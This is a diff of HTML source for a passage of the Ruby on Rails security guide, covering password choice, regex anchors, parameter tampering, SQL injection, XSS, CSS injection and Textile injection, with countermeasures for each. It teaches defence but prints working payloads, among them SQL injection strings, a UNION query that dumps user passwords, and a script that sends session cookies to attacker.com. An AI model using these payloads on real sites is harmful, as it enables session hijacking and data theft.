    Do you find it hard to remember all your passwords? Don't write them down, but use the initial letters of each word in an easy to remember sentence.

    -

    Bruce Schneier, a security technologist, has analysed 34,000 real-world user names and passwords from the MySpace phishing attack mentioned earlier. It turns out that most of the passwords are quite easy to crack. The 20 most common passwords are:

    -

    password1, abc123, myspace1, password, blink182, qwerty1, **you, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1 and monkey.

    -

    It is interesting that only 4% of these passwords were dictionary words and the great majority is actually alphanumeric. However, password cracker dictionaries contain a large number of today's passwords, and they try out all kinds of (alphanumerical) combinations. If an attacker knows your user name and you use a weak password, your account will be easily cracked.

    -

    A good password is a long alphanumeric combination of mixed cases. As this is quite hard to remember, it is advisable to enter only the first letters of a sentence that you can easily remember. For example "The quick brown fox jumps over the lazy dog" will be "Tqbfjotld". Note that this is just an example, you should not use well known phrases like these, as they might appear in cracker dictionaries, too.

    +

    -- Do you find it hard to remember all your passwords? Don’t write them down, but use the initial letters of each word in an easy to remember sentence.

    +

    Bruce Schneier, a security technologist, has analysed 34,000 real-world user names and passwords from the MySpace phishing attack mentioned earlier. It turns out that most of the passwords are quite easy to crack. The 20 most common passwords are:

    +

    password1, abc123, myspace1, password, blink182, qwerty1, **you, 123abc, baseball1, football1, 123456, soccer, monkey1, liverpool1, princess1, jordan23, slipknot1, superman1, iloveyou1 and monkey.

    +

    It is interesting that only 4% of these passwords were dictionary words and the great majority is actually alphanumeric. However, password cracker dictionaries contain a large number of today’s passwords, and they try out all kinds of (alphanumerical) combinations. If an attacker knows your user name and you use a weak password, your account will be easily cracked.

    +

    A good password is a long alphanumeric combination of mixed cases. As this is quite hard to remember, it is advisable to enter only the first letters of a sentence that you can easily remember. For example "The quick brown fox jumps over the lazy dog" will be "Tqbfjotld". Note that this is just an example, you should not use well known phrases like these, as they might appear in cracker dictionaries, too.

    7.6. Regular expressions

    -

    A common pitfall in Ruby's regular expressions is to match the string's beginning and end by ^ and $, instead of \A and \z.

    -

    Ruby uses a slightly different approach than many other languages to match the end and the beginning of a string. That is why even many Ruby and Rails books make this wrong. So how is this a security threat? Imagine you have a File model and you validate the file name by a regular expression like this:

    +

    -- A common pitfall in Ruby’s regular expressions is to match the string’s beginning and end by ^ and $, instead of \A and \z.

    +

    Ruby uses a slightly different approach than many other languages to match the end and the beginning of a string. That is why even many Ruby and Rails books make this wrong. So how is this a security threat? Imagine you have a File model and you validate the file name by a regular expression like this:

    class File < ActiveRecord::Base
       validates_format_of :name, :with => /^[\w\.\-\+]+$/
    -end
    -
    -

    This means, upon saving, the model will validate the file name to consist only of alphanumeric characters, dots, + and -. And the programmer added ^ and $ so that file name will contain these characters from the beginning to the end of the string. However, in Ruby ^ and $ matches the line beginning and line end. And thus a file name like this passes the filter without problems:

    +end
    +

    This means, upon saving, the model will validate the file name to consist only of alphanumeric characters, dots, + and -. And the programmer added ^ and $ so that file name will contain these characters from the beginning to the end of the string. However, in Ruby ^ and $ matches the line beginning and line end. And thus a file name like this passes the filter without problems:

    file.txt%0A<script>alert('hello')</script>
    -

    Whereas %0A is a line feed in URL encoding, so Rails automatically converts it to "file.txt\n<script>alert(hello)</script>". This file name passes the filter because the regular expression matches – up to the line end, the rest does not matter. The correct expression should read:

    +

    Whereas %0A is a line feed in URL encoding, so Rails automatically converts it to "file.txt\n<script>alert(hello)</script>". This file name passes the filter because the regular expression matches – up to the line end, the rest does not matter. The correct expression should read:

    /\A[\w\.\-\+]+\z/
    -[source, ruby]
    -
    +[source, ruby]

    7.7. Privilege escalation

    -

    Changing a single parameter may give the user unauthorized access. Remember that every parameter may be changed, no matter how much you hide or obfuscate it.

    -

    The most common parameter that a user might tamper with, is the id parameter, as in http://www.domain.com/project/1, whereas 1 is the id. It will be available in params[:id] in the controller. There, you will most likely do something like this:

    +

    -- Changing a single parameter may give the user unauthorized access. Remember that every parameter may be changed, no matter how much you hide or obfuscate it.

    +

    The most common parameter that a user might tamper with, is the id parameter, as in http://www.domain.com/project/1, whereas 1 is the id. It will be available in params[:id] in the controller. There, you will most likely do something like this:

    -
    @project = Project.find(params[:id])
    -
    -

    This is alright for some web applications, but certainly not if the user is not authorized to view all projects. If the user changes the id to 42, and he is not allowed to see that information, he will have access to it anyway. Instead, query the user's access rights, too:

    +
    @project = Project.find(params[:id])
    +

    This is alright for some web applications, but certainly not if the user is not authorized to view all projects. If the user changes the id to 42, and he is not allowed to see that information, he will have access to it anyway. Instead, query the user’s access rights, too:

    -
    @project = @current_user.projects.find(params[:id])
    -
    -

    Depending on your web application, there will be many more parameters the user can tamper with. As a rule of thumb, no user input data is secure, until proven otherwise, and every parameter from the user is potentially manipulated.

    -

    Don‘t be fooled by security by obfuscation and JavaScript security. The Web Developer Toolbar for Mozilla Firefox lets you review and change every form's hidden fields. JavaScript can be used to validate user input data, but certainly not to prevent attackers from sending malicious requests with unexpected values. The Live Http Headers plugin for Mozilla Firefox logs every request and may repeat and change them. That is an easy way to bypass any JavaScript validations. And there are even client-side proxies that allow you to intercept any request and response from and to the Internet.

    +
    @project = @current_user.projects.find(params[:id])
    +

    Depending on your web application, there will be many more parameters the user can tamper with. As a rule of thumb, no user input data is secure, until proven otherwise, and every parameter from the user is potentially manipulated.

    +

    Don‘t be fooled by security by obfuscation and JavaScript security. The Web Developer Toolbar for Mozilla Firefox lets you review and change every form’s hidden fields. JavaScript can be used to validate user input data, but certainly not to prevent attackers from sending malicious requests with unexpected values. The Live Http Headers plugin for Mozilla Firefox logs every request and may repeat and change them. That is an easy way to bypass any JavaScript validations. And there are even client-side proxies that allow you to intercept any request and response from and to the Internet.

    8. Injection

    -

    Injection is a class of attacks that introduce malicious code or parameters into a web application in order to run it within its security context. Prominent examples of injection are cross-site scripting (XSS) and SQL injection.

    -

    Injection is very tricky, because the same code or parameter can be malicious in one context, but totally harmless in another. A context can be a scripting, query or programming language, the shell or a Ruby/Rails method. The following sections will cover all important contexts where injection attacks may happen. The first section, however, covers an architectural decision in connection with Injection.

    +

    -- Injection is a class of attacks that introduce malicious code or parameters into a web application in order to run it within its security context. Prominent examples of injection are cross-site scripting (XSS) and SQL injection.

    +

    Injection is very tricky, because the same code or parameter can be malicious in one context, but totally harmless in another. A context can be a scripting, query or programming language, the shell or a Ruby/Rails method. The following sections will cover all important contexts where injection attacks may happen. The first section, however, covers an architectural decision in connection with Injection.

    8.1. Whitelists versus Blacklists

    -

    When sanitizing, protecting or verifying something, whitelists over blacklists.

    -

    A blacklist can be a list of bad e-mail addresses, non-public actions or bad HTML tags. This is opposed to a whitelist which lists the good e-mail addresses, public actions, good HTML tags and so on. Although, sometimes it is not possible to create a whitelist (in a SPAM filter, for example), prefer to use whitelist approaches:

    -
      +

      -- When sanitizing, protecting or verifying something, whitelists over blacklists.

      +

      A blacklist can be a list of bad e-mail addresses, non-public actions or bad HTML tags. This is opposed to a whitelist which lists the good e-mail addresses, public actions, good HTML tags and so on. Although, sometimes it is not possible to create a whitelist (in a SPAM filter, for example), prefer to use whitelist approaches:

      +
      • -Use before_filter :only ⇒ […] instead of :except ⇒ […]. This way you don't forget to turn it off for newly added actions. +Use before_filter :only => [...] instead of :except => [...]. This way you don’t forget to turn it off for newly added actions.

      • @@ -1002,9 +982,9 @@ Allow <strong> instead of removing <script> against Cross-Site Scrip
      • -Don't try to correct user input by blacklists: +Don’t try to correct user input by blacklists:

        -
          +
          • This will make the attack work: "<sc<script>ript>".gsub("<script>", "") @@ -1018,199 +998,194 @@ But reject malformed input

        -

        Whitelists are also a good approach against the human factor of forgetting something in the blacklist.

        +

        Whitelists are also a good approach against the human factor of forgetting something in the blacklist.

        8.2. SQL Injection

        -

        Thanks to clever methods, this is hardly a problem in most Rails applications. However, this is a very devastating and common attack in web applications, so it is important to understand the problem.

        +

        -- Thanks to clever methods, this is hardly a problem in most Rails applications. However, this is a very devastating and common attack in web applications, so it is important to understand the problem.

        8.2.1. Introduction

        -

        SQL injection attacks aim at influencing database queries by manipulating web application parameters. A popular goal of SQL injection attacks is to bypass authorization. Another goal is to carry out data manipulation or reading arbitrary data. Here is an example of how not to use user input data in a query:

        +

        SQL injection attacks aim at influencing database queries by manipulating web application parameters. A popular goal of SQL injection attacks is to bypass authorization. Another goal is to carry out data manipulation or reading arbitrary data. Here is an example of how not to use user input data in a query:

        -
        Project.find(:all, :conditions => "name = '#{params[:name]}'")
        -
        -

        This could be in a search action and the user may enter a project's name that he wants to find. If a malicious user enters OR 1=1, the resulting SQL query will be:

        +
        Project.find(:all, :conditions => "name = '#{params[:name]}'")
    +

    This could be in a search action and the user may enter a project’s name that he wants to find. If a malicious user enters OR 1=1, the resulting SQL query will be:

    SELECT * FROM projects WHERE name = '' OR 1 --'
    -

    The two dashes start a comment ignoring everything after it. So the query returns all records from the projects table including those blind to the user. This is because the condition is true for all records.

    +

    The two dashes start a comment ignoring everything after it. So the query returns all records from the projects table including those blind to the user. This is because the condition is true for all records.

    8.2.2. Bypassing authorization

    -

    Usually a web application includes access control. The user enters his login credentials, the web applications tries to find the matching record in the users table. The application grants access when it finds a record. However, an attacker may possibly bypass this check with SQL injection. The following shows a typical database query in Rails to find the first record in the users table which matches the login credentials parameters supplied by the user.

    +

    Usually a web application includes access control. The user enters his login credentials, the web applications tries to find the matching record in the users table. The application grants access when it finds a record. However, an attacker may possibly bypass this check with SQL injection. The following shows a typical database query in Rails to find the first record in the users table which matches the login credentials parameters supplied by the user.

    -
    User.find(:first, "login = '#{params[:name]}' AND password = '#{params[:password]}'")
    -
    -

    If an attacker enters OR '1=1 as the name, and OR 2>'1 as the password, the resulting SQL query will be:

    +
    User.find(:first, "login = '#{params[:name]}' AND password = '#{params[:password]}'")
    +

    If an attacker enters OR '1=1 as the name, and ' OR '2>'1 as the password, the resulting SQL query will be:

    SELECT * FROM users WHERE login = '' OR '1'='1' AND password = '' OR '2'>'1' LIMIT 1
    -

    This will simply find the first record in the database, and grants access to this user.

    +

    This will simply find the first record in the database, and grants access to this user.

    8.2.3. Unauthorized reading

    -

    The UNION statement connects two SQL queries and returns the data in one set. An attacker can use it to read arbitrary data from the database. Let's take the example from above:

    +

    The UNION statement connects two SQL queries and returns the data in one set. An attacker can use it to read arbitrary data from the database. Let’s take the example from above:

    -
    Project.find(:all, :conditions => "name = '#{params[:name]}'")
    -
    -

    And now let's inject another query using the UNION statement:

    +
    Project.find(:all, :conditions => "name = '#{params[:name]}'")
    +

    And now let’s inject another query using the UNION statement:

    ') UNION SELECT id,login AS name,password AS description,1,1,1 FROM users --
    -

    This will result in the following SQL query:

    +

    This will result in the following SQL query:

    SELECT * FROM projects WHERE (name = '') UNION
       SELECT id,login AS name,password AS description,1,1,1 FROM users --')
    -

    The result won't be a list of projects (because there is no project with an empty name), but a list of user names and their password. So hopefully you encrypted the passwords in the database! The only problem for the attacker is, that the number of columns has to be the same in both queries. That's why the second query includes a list of ones (1), which will be always the value 1, in order to match the number of columns in the first query.

    -

    Also, the second query renames some columns with the AS statement so that the web application displays the values from the user table. Be sure to update your Rails to at least 2.1.1.

    +

    The result won’t be a list of projects (because there is no project with an empty name), but a list of user names and their password. So hopefully you encrypted the passwords in the database! The only problem for the attacker is, that the number of columns has to be the same in both queries. That’s why the second query includes a list of ones (1), which will be always the value 1, in order to match the number of columns in the first query.

    +

    Also, the second query renames some columns with the AS statement so that the web application displays the values from the user table. Be sure to update your Rails to at least 2.1.1.

    8.2.4. Countermeasures

    -

    Ruby on Rails has a built in filter for special SQL characters, which will escape ' , " , NULL character and line breaks. Using Model.find(id) or Model.find_by_some thing(something) automatically applies this countermeasure[,#fffcdb]. But in SQL fragments, especially in conditions fragments (:conditions ⇒ "…"), the connection.execute() or Model.find_by_sql() methods, it has to be applied manually.

    -

    Instead of passing a string to the conditions option, you can pass an array to sanitize tainted strings like this:

    +

    Ruby on Rails has a built in filter for special SQL characters, which will escape ' , " , NULL character and line breaks. Using Model.find(id) or Model.find_by_some thing(something) automatically applies this countermeasure[,#fffcdb]. But in SQL fragments, especially in conditions fragments (:conditions => "..."), the connection.execute() or Model.find_by_sql() methods, it has to be applied manually.

    +

    Instead of passing a string to the conditions option, you can pass an array to sanitize tainted strings like this:

    -
    Model.find(:first, :conditions => ["login = ? AND password = ?", entered_user_name, entered_password])
    -
    -

    As you can see, the first part of the array is an SQL fragment with question marks. The sanitized versions of the variables in the second part of the array replace the question marks. Or you can pass a hash for the same result:

    +
    Model.find(:first, :conditions => ["login = ? AND password = ?", entered_user_name, entered_password])
    +

    As you can see, the first part of the array is an SQL fragment with question marks. The sanitized versions of the variables in the second part of the array replace the question marks. Or you can pass a hash for the same result:

    -
    Model.find(:first, :conditions => {:login => entered_user_name, :password => entered_password})
    -
    -

    The array or hash form is only available in model instances. You can try sanitize_sql() elsewhere. Make it a habit to think about the security consequences when using an external string in SQL.

    +
    Model.find(:first, :conditions => {:login => entered_user_name, :password => entered_password})
    +

    The array or hash form is only available in model instances. You can try sanitize_sql() elsewhere. Make it a habit to think about the security consequences when using an external string in SQL.

    8.3. Cross-Site Scripting (XSS)

    -

    The most widespread, and one of the most devastating security vulnerabilities in web applications is XSS. This malicious attack injects client-side executable code. Rails provides helper methods to fend these attacks off.

    +

    -- The most widespread, and one of the most devastating security vulnerabilities in web applications is XSS. This malicious attack injects client-side executable code. Rails provides helper methods to fend these attacks off.

    8.3.1. Entry points

    -

    An entry point is a vulnerable URL and its parameters where an attacker can start an attack.

    -

    The most common entry points are message posts, user comments, and guest books, but project titles, document names and search result pages have also been vulnerable - just about everywhere where the user can input data. But the input does not necessarily have to come from input boxes on web sites, it can be in any URL parameter – obvious, hidden or internal. Remember that the user may intercept any traffic. Applications, such as the Live HTTP Headers Firefox plugin, or client-site proxies make it easy to change requests.

    -

    XSS attacks work like this: An attacker injects some code, the web application saves it and displays it on a page, later presented to a victim. Most XSS examples simply display an alert box, but it is more powerful than that. XSS can steal the cookie, hijack the session; redirect the victim to a fake website, display advertisements for the benefit of the attacker, change elements on the web site to get confidential information or install malicious software through security holes in the web browser.

    -

    During the second half of 2007, there were 88 vulnerabilities reported in Mozilla browsers, 22 in Safari, 18 in IE, and 12 in Opera. The Symantec Global Internet Security threat report also documented 239 browser plug-in vulnerabilities in the last six months of 2007. Mpack is a very active and up-to-date attack framework which exploits these vulnerabilities. For criminal hackers, it is very attractive to exploit an SQL-Injection vulnerability in a web application framework and insert malicious code in every textual table column. In April 2008 more than 510,000 sites were hacked like this, among them the British government, United Nations and many more high targets.

    -

    A relatively new, and unusual, form of entry points are banner advertisements. In earlier 2008, malicious code appeared in banner ads on popular sites, such as MySpace and Excite, according to Trend Micro.

    +

    An entry point is a vulnerable URL and its parameters where an attacker can start an attack.

    +

    The most common entry points are message posts, user comments, and guest books, but project titles, document names and search result pages have also been vulnerable - just about everywhere where the user can input data. But the input does not necessarily have to come from input boxes on web sites, it can be in any URL parameter – obvious, hidden or internal. Remember that the user may intercept any traffic. Applications, such as the Live HTTP Headers Firefox plugin, or client-site proxies make it easy to change requests.

    +

    XSS attacks work like this: An attacker injects some code, the web application saves it and displays it on a page, later presented to a victim. Most XSS examples simply display an alert box, but it is more powerful than that. XSS can steal the cookie, hijack the session; redirect the victim to a fake website, display advertisements for the benefit of the attacker, change elements on the web site to get confidential information or install malicious software through security holes in the web browser.

    +

    During the second half of 2007, there were 88 vulnerabilities reported in Mozilla browsers, 22 in Safari, 18 in IE, and 12 in Opera. The Symantec Global Internet Security threat report also documented 239 browser plug-in vulnerabilities in the last six months of 2007. Mpack is a very active and up-to-date attack framework which exploits these vulnerabilities. For criminal hackers, it is very attractive to exploit an SQL-Injection vulnerability in a web application framework and insert malicious code in every textual table column. In April 2008 more than 510,000 sites were hacked like this, among them the British government, United Nations and many more high targets.

    +

    A relatively new, and unusual, form of entry points are banner advertisements. In earlier 2008, malicious code appeared in banner ads on popular sites, such as MySpace and Excite, according to Trend Micro.

    8.3.2. HTML/JavaScript Injection

    -

    The most common XSS language is of course the most popular client-side scripting language JavaScript, often in combination with HTML. Escaping user input is essential.

    -

    Here is the most straightforward test to check for XSS:

    +

    The most common XSS language is of course the most popular client-side scripting language JavaScript, often in combination with HTML. Escaping user input is essential.

    +

    Here is the most straightforward test to check for XSS:

    <script>alert('Hello');</script>
    -

    This JavaScript code will simply display an alert box. The next examples do exactly the same, only in very uncommon places:

    +

    This JavaScript code will simply display an alert box. The next examples do exactly the same, only in very uncommon places:

    <img src=javascript:alert('Hello')>
     <table background="javascript:alert('Hello')">
    -

    These examples don't do any harm so far, so let's see how an attacker can steal the user's cookie (and thus hijack the user's session). In JavaScript you can use the document.cookie property to read and write the document's cookie. JavaScript enforces the same origin policy, that means a script from one domain cannot access cookies of another domain. The document.cookie property holds the cookie of the originating web server. However, you can read and write this property, if you embed the code directly in the HTML document (as it happens with XSS). Inject this anywhere in your web application to see your own cookie on the result page:

    +

    These examples don’t do any harm so far, so let’s see how an attacker can steal the user’s cookie (and thus hijack the user’s session). In JavaScript you can use the document.cookie property to read and write the document’s cookie. JavaScript enforces the same origin policy, that means a script from one domain cannot access cookies of another domain. The document.cookie property holds the cookie of the originating web server. However, you can read and write this property, if you embed the code directly in the HTML document (as it happens with XSS). Inject this anywhere in your web application to see your own cookie on the result page:

    <script>document.write(document.cookie);</script>
    -

    For an attacker, of course, this is not useful, as the victim will see his own cookie. The next example will try to load an image from the URL http://www.attacker.com/ plus the cookie. Of course this URL does not exist, so the browser displays nothing. But the attacker can review his web server's access log files to see the victims cookie.

    +

    For an attacker, of course, this is not useful, as the victim will see his own cookie. The next example will try to load an image from the URL http://www.attacker.com/ plus the cookie. Of course this URL does not exist, so the browser displays nothing. But the attacker can review his web server’s access log files to see the victims cookie.

    <script>document.write('<img src="http://www.attacker.com/' + document.cookie + '">');</script>
    -

    The log files on www.attacker.com will read like this:

    +

    The log files on www.attacker.com will read like this:

    GET http://www.attacker.com/_app_session=836c1c25278e5b321d6bea4f19cb57e2
    -

    You can mitigate these attacks (in the obvious way) by adding the httpOnly flag to cookies, so that document.cookie may not be read by JavaScript. Http only cookies can be used from IE v6.SP1, Firefox v2.0.0.5 and Opera 9.5. Safari is still considering, it ignores the option. But other, older browsers (such as WebTV and IE 5.5 on Mac) can actually cause the page to fail to load. Be warned that cookies will still be visible using Ajax, though.

    +

    You can mitigate these attacks (in the obvious way) by adding the httpOnly flag to cookies, so that document.cookie may not be read by JavaScript. Http only cookies can be used from IE v6.SP1, Firefox v2.0.0.5 and Opera 9.5. Safari is still considering, it ignores the option. But other, older browsers (such as WebTV and IE 5.5 on Mac) can actually cause the page to fail to load. Be warned that cookies will still be visible using Ajax, though.

    Defacement
    -

    With web page defacement an attacker can do a lot of things, for example, present false information or lure the victim on the attackers web site to steal the cookie, login credentials or other sensitive data. The most popular way is to include code from external sources by iframes:

    +

    With web page defacement an attacker can do a lot of things, for example, present false information or lure the victim on the attackers web site to steal the cookie, login credentials or other sensitive data. The most popular way is to include code from external sources by iframes:

    <iframe name=”StatPage” src="http://58.xx.xxx.xxx" width=5 height=5 style=”display:none”></iframe>
    -

    This loads arbitrary HTML and/or JavaScript from an external source and embeds it as part of the site. This iFrame is taken from an actual attack on legitimate Italian sites using the Mpack attack framework. Mpack tries to install malicious software through security holes in the web browser – very successfully, 50% of the attacks succeed.

    -

    A more specialized attack could overlap the entire web site or display a login form, which looks the same as the site's original, but transmits the user name and password to the attackers site. Or it could use CSS and/or JavaScript to hide a legitimate link in the web application, and display another one at its place which redirects to a fake web site.

    -

    Reflected injection attacks are those where the payload is not stored to present it to the victim later on, but included in the URL. Especially search forms fail to escape the search string. The following link presented a page which stated that "George Bush appointed a 9 year old boy to be the chairperson…":

    +

    This loads arbitrary HTML and/or JavaScript from an external source and embeds it as part of the site. This iFrame is taken from an actual attack on legitimate Italian sites using the Mpack attack framework. Mpack tries to install malicious software through security holes in the web browser – very successfully, 50% of the attacks succeed.

    +

    A more specialized attack could overlap the entire web site or display a login form, which looks the same as the site’s original, but transmits the user name and password to the attackers site. Or it could use CSS and/or JavaScript to hide a legitimate link in the web application, and display another one at its place which redirects to a fake web site.

    +

    Reflected injection attacks are those where the payload is not stored to present it to the victim later on, but included in the URL. Especially search forms fail to escape the search string. The following link presented a page which stated that "George Bush appointed a 9 year old boy to be the chairperson...":

    http://www.cbsnews.com/stories/2002/02/15/weather_local/main501644.shtml?zipcode=1-->
       <script src=http://www.securitylab.ru/test/sc.js></script><!--
    Countermeasures
    -

    It is very important to filter malicious input, but it is also important to escape the output of the web application.

    -

    Especially for XSS, it is important to do whitelist input filtering instead of blacklist. Whitelist filtering states the values allowed as opposed to the values not allowed. Blacklists are never complete.

    -

    Imagine a blacklist deletes “script” from the user input. Now the attacker injects “<scrscriptipt>”, and after the filter, “<script>” remains. Earlier versions of Rails used a blacklist approach for the strip_tags(), strip_links() and sanitize() method. So this kind of injection was possible:

    +

    It is very important to filter malicious input, but it is also important to escape the output of the web application.

    +

    Especially for XSS, it is important to do whitelist input filtering instead of blacklist. Whitelist filtering states the values allowed as opposed to the values not allowed. Blacklists are never complete.

    +

    Imagine a blacklist deletes “script” from the user input. Now the attacker injects “<scrscriptipt>”, and after the filter, “<script>” remains. Earlier versions of Rails used a blacklist approach for the strip_tags(), strip_links() and sanitize() method. So this kind of injection was possible:

    strip_tags("some<<b>script>alert('hello')<</b>/script>")
    -

    This returned "some<script>alert(hello)</script>", which makes an attack work. That's why I vote for a whitelist approach, using the updated Rails 2 method sanitize():

    +

    This returned "some<script>alert(hello)</script>", which makes an attack work. That’s why I vote for a whitelist approach, using the updated Rails 2 method sanitize():

    tags = %w(a acronym b strong i em li ul ol h1 h2 h3 h4 h5 h6 blockquote br cite sub sup ins p)
     s = sanitize(user_input, :tags => tags, :attributes => %w(href title))
    -

    This allows only the given tags and does a good job, even against all kinds of tricks and malformed tags.

    -

    As a second step, it is good practice to escape all output of the application, especially when re-displaying user input, which hasn't been input filtered (as in the search form example earlier on). Use escapeHTML() (or its alias h()) method to replace the HTML input characters &,",<,> by its uninterpreted representations in HTML (&amp;, &quot;, &lt; and &gt;). However, it can easily happen that the programmer forgets to use it, so it is recommended to use the SafeErb plugin. SafeErb reminds you to escape strings from external sources.

    +

    This allows only the given tags and does a good job, even against all kinds of tricks and malformed tags.

    +

    As a second step, it is good practice to escape all output of the application, especially when re-displaying user input, which hasn’t been input filtered (as in the search form example earlier on). Use escapeHTML() (or its alias h()) method to replace the HTML input characters &,",<,> by its uninterpreted representations in HTML (&, ", < and >). However, it can easily happen that the programmer forgets to use it, so it is recommended to use the SafeErb plugin. SafeErb reminds you to escape strings from external sources.

    Obfuscation and Encoding Injection
    -

    Network traffic is mostly based on the limited Western alphabet, so new character encodings, such as Unicode, emerged, to transmit characters in other languages. But, this is also a threat to web applications, as malicious code can be hidden in different encodings that the web browser might be able to process, but the web application might not. Here is an attack vector in UTF-8 encoding:

    +

    Network traffic is mostly based on the limited Western alphabet, so new character encodings, such as Unicode, emerged, to transmit characters in other languages. But, this is also a threat to web applications, as malicious code can be hidden in different encodings that the web browser might be able to process, but the web application might not. Here is an attack vector in UTF-8 encoding:

    <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;
       &#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
    -

    This example pops up a message box. It will be recognized by the above sanitize() filter, though. A great tool to obfuscate and encode strings, and thus “get to know your enemy”, is the Hackvertor. Rails‘ sanitize() method does a good job to fend off encoding attacks.

    +

    This example pops up a message box. It will be recognized by the above sanitize() filter, though. A great tool to obfuscate and encode strings, and thus “get to know your enemy”, is the Hackvertor. Rails‘ sanitize() method does a good job to fend off encoding attacks.

    8.3.3. Examples from the underground

    -

    In order to understand today's attacks on web applications, it's best to take a look at some real-world attack vectors.

    -

    The following is an excerpt from the Js.Yamanner@m Yahoo! Mail worm. It appeared on June 11, 2006 and was the first webmail interface worm:

    +

    -- In order to understand today’s attacks on web applications, it’s best to take a look at some real-world attack vectors.

    +

    The following is an excerpt from the Js.Yamanner@m Yahoo! Mail worm. It appeared on June 11, 2006 and was the first webmail interface worm:

    <img src='http://us.i1.yimg.com/us.yimg.com/i/us/nt/ma/ma_mail_1.gif'
       target=""onload="var http_request = false;    var Email = '';
       var IDList = '';   var CRumb = '';   function makeRequest(url, Func, Method,Param) { ...
    -

    The worms exploits a hole in Yahoo's HTML/JavaScript filter, it usually filters all target and onload attributes from tags (because there can be JavaScript). The filter is applied only once, however, so the onload attribute with the worm code stays in place. This is a good example why blacklist filters are never complete and why it is hard to allow HTML/JavaScript in a web application.

    -

    Another proof-of-concept webmail worm is Nduja, a cross-domain worm for four Italian webmail services. Find more details and a video demonstration on Rosario Valotta's website. Both webmail worms have the goal to harvest email addresses, something a criminal hacker could make money with.

    -

    In December 2006, 34,000 actual user names and passwords were stolen in a MySpace phishing attack. The idea of the attack was to create a profile page named “login_home_index_html”, so the URL looked very convincing. Specially-crafted HTML and CSS was used to hide the genuine MySpace content from the page and instead display its own login form.

    -

    The MySpace Samy worm will be discussed in the CSS Injection section.

    +

    The worms exploits a hole in Yahoo’s HTML/JavaScript filter, it usually filters all target and onload attributes from tags (because there can be JavaScript). The filter is applied only once, however, so the onload attribute with the worm code stays in place. This is a good example why blacklist filters are never complete and why it is hard to allow HTML/JavaScript in a web application.

    +

    Another proof-of-concept webmail worm is Nduja, a cross-domain worm for four Italian webmail services. Find more details and a video demonstration on Rosario Valotta’s website. Both webmail worms have the goal to harvest email addresses, something a criminal hacker could make money with.

    +

    In December 2006, 34,000 actual user names and passwords were stolen in a MySpace phishing attack. The idea of the attack was to create a profile page named “login_home_index_html”, so the URL looked very convincing. Specially-crafted HTML and CSS was used to hide the genuine MySpace content from the page and instead display its own login form.

    +

    The MySpace Samy worm will be discussed in the CSS Injection section.

    8.4. CSS Injection

    -

    CSS Injection is actually JavaScript injection, because some browsers (IE, some versions of Safari and others) allow JavaScript in CSS. Think twice about allowing custom CSS in your web application.

    -

    CSS Injection is explained best by a well-known worm, the MySpace Samy worm. This worm automatically sent a friend request to Samy (the attacker) simply by visiting his profile. Within several hours he had over 1 million friend requests, but it creates too much traffic on MySpace, so that the site goes offline. The following is a technical explanation of the worm.

    -

    MySpace blocks many tags, however it allows CSS. So the worm's author put JavaScript into CSS like this:

    +

    -- CSS Injection is actually JavaScript injection, because some browsers (IE, some versions of Safari and others) allow JavaScript in CSS. Think twice about allowing custom CSS in your web application.

    +

    CSS Injection is explained best by a well-known worm, the MySpace Samy worm. This worm automatically sent a friend request to Samy (the attacker) simply by visiting his profile. Within several hours he had over 1 million friend requests, but it creates too much traffic on MySpace, so that the site goes offline. The following is a technical explanation of the worm.

    +

    MySpace blocks many tags, however it allows CSS. So the worm’s author put JavaScript into CSS like this:

    <div style="background:url('javascript:alert(1)')">
    -

    So the payload is in the style attribute. But there are no quotes allowed in the payload, because single and double quotes have already been used. But JavaScript allows has a handy eval() function which executes any string as code.

    +

    So the payload is in the style attribute. But there are no quotes allowed in the payload, because single and double quotes have already been used. But JavaScript allows has a handy eval() function which executes any string as code.

    <div id="mycode" expr="alert('hah!')" style="background:url('javascript:eval(document.all.mycode.expr)')">
    -

    The eval() function is a nightmare for blacklist input filters, as it allows the style attribute to hide the word “innerHTML”:

    +

    The eval() function is a nightmare for blacklist input filters, as it allows the style attribute to hide the word “innerHTML”:

    alert(eval('document.body.inne' + 'rHTML'));
    -

    The next problem was MySpace filtering the word “javascript”, so the author used “java<NEWLINE>script" to get around this:

    +

    The next problem was MySpace filtering the word “javascript”, so the author used “java<NEWLINE>script" to get around this:

    <div id="mycode" expr="alert('hah!')" style="background:url('java↵
script:eval(document.all.mycode.expr)')">
    -

    Another problem for the worm's author were CSRF security tokens. Without them he couldn't send a friend request over POST. He got around it by sending a GET to the page right before adding a the user and parsing the result for the CSRF token.

    -

    In the end, he got a 4 KB worm, which he injected into his profile page.

    -

    The moz-binding CSS property proved to be another way to introduce JavaScript in CSS in Gecko-based browsers (Firefox, for example).

    +

    Another problem for the worm’s author were CSRF security tokens. Without them he couldn’t send a friend request over POST. He got around it by sending a GET to the page right before adding a the user and parsing the result for the CSRF token.

    +

    In the end, he got a 4 KB worm, which he injected into his profile page.

    +

    The moz-binding CSS property proved to be another way to introduce JavaScript in CSS in Gecko-based browsers (Firefox, for example).

    8.4.1. Countermeasures

    -

    This example, again, showed that a blacklist filter is never complete. However, as custom CSS in web applications is a quite rare feature, I am not aware of a whitelist CSS filter. If you want to allow custom colours or images, you can allow the user to choose them and build the CSS in the web application. Use Rails' sanitize() method as a model for a whitelist CSS filter, if you really need one.

    +

    This example, again, showed that a blacklist filter is never complete. However, as custom CSS in web applications is a quite rare feature, I am not aware of a whitelist CSS filter. If you want to allow custom colours or images, you can allow the user to choose them and build the CSS in the web application. Use Rails' sanitize() method as a model for a whitelist CSS filter, if you really need one.

    8.5. Textile Injection

    -

    If you want to provide text formatting other than HTML (due to security), use a mark-up language which is converted to HTML on the server-side. RedCloth is such a language for Ruby, but without precautions, it is also vulnerable to XSS.

    +

    -- If you want to provide text formatting other than HTML (due to security), use a mark-up language which is converted to HTML on the server-side. RedCloth is such a language for Ruby, but without precautions, it is also vulnerable to XSS.

    For example, RedCloth translates _test_ to <em>test<em>, which makes the text italic. However, up to the current version 3.0.4, it is still vulnerable to XSS. Get the http://www.redcloth.org[all-new version 4] that removed serious bugs. However, even that version has http://www.rorsecurity.info/journal/2008/10/13/new-redcloth-security.html[some security bugs], so the countermeasures still apply. Here is an example for version 3.0.4:
